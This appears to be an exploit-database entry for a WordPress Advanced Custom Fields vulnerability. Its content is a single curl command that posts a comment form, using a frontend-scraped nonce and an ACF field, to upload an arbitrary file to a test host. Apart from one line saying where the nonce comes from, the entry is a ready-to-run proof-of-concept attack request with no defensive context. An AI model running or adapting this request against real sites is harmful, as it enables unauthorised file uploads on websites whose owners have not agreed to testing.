Share
## https://sploitus.com/exploit?id=WPEX-ID:3FDE5336-552C-4861-8B4D-89A16735C0E2
The nonce is retrieved from a form in the frontend
curl \
-i -s -k -X 'POST' \
-F "comment=Test comment" \
-F '_acf_post_id=1' \
-F '_acf_validation=1' \
-F '_acf_nonce=ba2ef314e0' \
-F '_acf_changed=0' \
-F 'acf[field_62c8939d255d8]=Something' \
-F 'author=testing' \
-F 'email=testing@example.com' \
-F 'url=' \
-F 'submit=Post+Comment' \
-F 'comment_post_ID=1' \
-F 'comment_parent=0' \
-F 'acf[name]=@rickroll.mp4' \
'http://play.local/wp-comments-post.php'